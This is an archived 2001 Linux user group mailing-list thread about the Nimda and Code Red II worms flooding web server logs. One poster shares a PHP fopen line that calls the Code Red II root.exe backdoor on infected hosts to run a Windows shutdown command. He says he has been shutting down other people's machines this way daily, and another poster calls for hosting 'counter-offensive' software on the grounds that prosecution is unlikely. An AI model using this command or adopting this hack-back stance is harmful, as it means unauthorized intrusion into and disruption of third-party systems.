[NTLUG:Discuss] New IIS Virus

Paul Ingendorf pauldy at wantek.net
Wed Sep 19 07:46:52 CDT 2001 

I have custom error logs setup and I use php files.  In these php files I check if the request url is the default.ida etc. If it is I use the old fopen command to send a get request like so.

fopen("http://" . $REMOTE_ADDR . "/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");

This basically shuts the machine down via the backdoor codred II installs.  I think I have posted the code in here before.  If you would like I can forward it to you.

-- 
-->> mailto:pauldy at wantek.net
-->> http://www.wantek.net/
Running ....... Cos anything else would be a waste...
`:::'                  .......  ......
 :::  *                  `::.    ::'
 ::: .::  .:.::.  .:: .::  `::. :'
 :::  ::   ::  ::  ::  ::    :::.
 ::: .::. .::  ::.  `::::. .:'  ::.
.:::.....................::'   .::::..


-----Original Message-----
From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
Of Daniel Hauck
Sent: Wednesday, September 19, 2001 7:20 AM
To: discuss at ntlug.org
Subject: Re: [NTLUG:Discuss] New IIS Virus


How about threatening the virus-spreading server owners with legal action?

Which/what script do you use to shut them down?

----- Original Message -----
From: "Paul Ingendorf" <pauldy at wantek.net>
To: <discuss at ntlug.org>
Sent: Wednesday, September 19, 2001 7:04 AM
Subject: RE: [NTLUG:Discuss] New IIS Virus


> I can attest that approximately 20% of what is in my log files are actual
webservers and not just your average joe running iis at home.  Of course
people on different subnets mileage may vary.  Which is something that gets
my goat because I know competent admins who are out of work right now and
many of the servers hitting me now are the ones I've been e-mailing for
about a month and some change now about fixing their servers on codered.
Plus my script has been shutting most of their machines down daily for the
past month and they still don't get the hint.  Oh well I'll be writing a
counter script soon much like the last one probably just to shut their
machine down once I figure out how this thing works and if that will be
sufficient.
>
> --
> -->> mailto:pauldy at wantek.net
> -->> http://www.wantek.net/
> Running ....... Cos anything else would be a waste...
> `:::'                  .......  ......
>  :::  *                  `::.    ::'
>  ::: .::  .:.::.  .:: .::  `::. :'
>  :::  ::   ::  ::  ::  ::    :::.
>  ::: .::. .::  ::.  `::::. .:'  ::.
> .:::.....................::'   .::::..
>
>
> -----Original Message-----
> From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
> Of Daniel Hauck
> Sent: Wednesday, September 19, 2001 6:37 AM
> To: discuss at ntlug.org
> Subject: Re: [NTLUG:Discuss] New IIS Virus
>
>
> Your statement is incomplete and/or inaccurate.  A majority of what I have
> seen are home users... users (not administrators) at home.  Microsoft has
> unleashed too much power to the every-day user.
>
> I know we have had this discussion before, so please restrain yourself
> better than I am, but I still hold that Microsoft should bear some
> responsibility over this.  There are thousands of Windows machines out
there
> running IIS and the owner/user doesn't even know about it.  It's sad.
>
> I would like to open up discussion about implementing "counter-agents."
> Clearly, there is little to no risk of prosecution and I think
> "self-defence" is a valid argument.  I'd be happy to host
counter-offensive
> software on my server while I still have port 80 access.
>
> ----- Original Message -----
> From: "Aaron Goldblatt" <aaron at goldblatt.net>
> To: <discuss at ntlug.org>
> Sent: Wednesday, September 19, 2001 6:26 AM
> Subject: Re: [NTLUG:Discuss] New IIS Virus
>
>
> > > Has anyone been getting hits on their macjines from this new virus? I
> >
> > I'll leave others to answer your direct question, but I'll observe that
> this
> > Nimda thing is harder on non-IIS servers than previous viruses.  Stuff
> like
> > Code Red produced a few dozen log entries a day.  This is producing
> thousands
> > of lines a day.  Nobody except viruses hit my web server anyway, so the
> > effect is minimal, but I do use the machine for other things, in
addition
> to
> > just being my web server.
> >
> > It isn't Windows administration or even Windows administrators that
bother
> me
> > so much as stupid Windows administration, and stupid Windows
> administrators.
> > Inattentive == stupid.
> >
> > ag
> > _______________________________________________
> > http://www.ntlug.org/mailman/listinfo/discuss
> >
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
_______________________________________________
http://www.ntlug.org/mailman/listinfo/discuss

More information about the Discuss mailing list